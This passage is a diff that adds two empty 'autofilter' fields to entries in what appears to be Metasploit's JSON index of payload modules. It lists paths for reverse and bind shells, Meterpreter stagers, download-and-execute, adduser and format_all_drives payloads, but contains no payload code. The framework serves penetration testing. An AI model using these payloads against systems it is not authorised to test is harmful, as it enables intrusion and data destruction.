06:26:21 +0000", "path": "/modules/payloads/singles/php/reverse_php.rb", @@ -106134,6 +134565,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/shell_findsock.rb", @@ -106163,6 +134596,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/bind_tcp.rb", @@ -106193,6 +134628,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", @@ -106222,6 +134659,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_http.rb", @@ -106251,6 +134690,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_https.rb", @@ -106280,6 +134721,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp.rb", @@ -106311,6 +134754,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", @@ -106341,6 +134786,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", @@ -106370,6 +134817,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", @@ -106399,6 +134848,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", @@ -106428,6 +134879,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", @@ -106457,6 +134910,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-27 14:18:54 +0000", "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", @@ -106486,6 +134941,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-23 23:04:02 +0000", "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", @@ -106515,6 +134972,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", @@ -106544,6 +135003,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", @@ -106573,6 +135034,8 @@ "platform": "Python", "arch": "python", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 13:33:36 +0000", "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", @@ -106602,6 +135065,8 @@ "platform": "R", "arch": "r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", @@ -106631,6 +135096,8 @@ "platform": "R", "arch": "r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 05:30:30 +0000", "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", @@ -106661,6 +135128,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", @@ -106691,6 +135160,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", @@ -106721,6 +135192,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", @@ -106750,6 +135223,8 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", @@ -106779,6 +135254,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", @@ -106808,6 +135285,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", @@ -106837,6 +135316,8 @@ "platform": "Solaris", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", @@ -106866,6 +135347,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", @@ -106895,6 +135378,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", @@ -106924,6 +135409,8 @@ "platform": "Solaris", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", @@ -106953,6 +135440,8 @@ "platform": "Unix", "arch": "tty", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/tty/unix/interact.rb", @@ -106985,6 +135474,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/adduser.rb", @@ -107018,6 +135509,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -107051,6 +135544,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -107083,6 +135578,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -107116,6 +135613,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -107147,6 +135646,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -107178,6 +135679,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -107210,6 +135713,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -107244,6 +135749,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -107276,6 +135783,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -107307,6 +135816,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -107340,6 +135851,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -107371,6 +135884,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -107402,6 +135917,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -107434,6 +135951,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -107465,6 +135984,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -107496,6 +136017,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -107528,6 +136051,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -107560,6 +136085,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -107593,6 +136120,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -107627,6 +136156,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -107661,6 +136192,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -107693,6 +136226,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -107724,6 +136259,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -107756,6 +136293,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -107785,6 +136324,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", @@ -107814,6 +136355,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/download_exec.rb", @@ -107844,6 +136387,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/exec.rb", @@ -107875,6 +136420,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/format_all_drives.rb", @@ -107905,6 +136452,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/loadlibrary.rb", @@ -107935,6 +136484,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/messagebox.rb", @@ -107969,6 +136520,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -108003,6 +136556,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -108036,6 +136591,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -108069,6 +136626,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -108102,6 +136661,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -108135,6 +136696,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -108168,6 +136731,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -108203,6 +136768,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -108236,6 +136803,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -108268,6 +136837,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -108303,6 +136874,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -108336,6 +136909,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -108369,6 +136944,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -108402,6 +136979,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_https.rb", @@ -108437,6 +137016,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb", @@ -108470,6 +137051,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -108502,6 +137085,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-01 03:49:00 +0000", "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", @@ -108535,6 +137120,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -108568,6 +137155,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -108601,6 +137190,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -108634,6 +137225,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -108668,6 +137261,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -108703,6 +137298,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -108738,6 +137335,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -108771,6 +137370,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -108804,6 +137405,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -108838,6 +137441,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -108872,6 +137477,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", @@ -108904,6 +137511,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-11 18:56:50 +0000", "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", @@ -108935,6 +137544,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", @@ -108966,6 +137577,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", @@ -108997,6 +137610,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", @@ -109028,6 +137643,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", @@ -109059,6 +137676,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", @@ -109088,6 +137707,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", @@ -109117,6 +137738,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", @@ -109150,6 +137773,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -109183,6 +137808,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -109215,6 +137842,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -109248,6 +137877,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -109279,6 +137910,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -109310,6 +137943,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -109342,6 +137977,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -109376,6 +138013,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -109408,6 +138047,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -109438,6 +138079,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -109470,6 +138113,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -109501,6 +138146,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -109532,6 +138179,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -109564,6 +138213,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -109596,6 +138247,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -109629,6 +138282,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -109663,6 +138318,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -109697,6 +138354,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -109729,6 +138388,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -109760,6 +138421,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -109793,6 +138456,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -109826,6 +138491,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -109858,6 +138525,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + 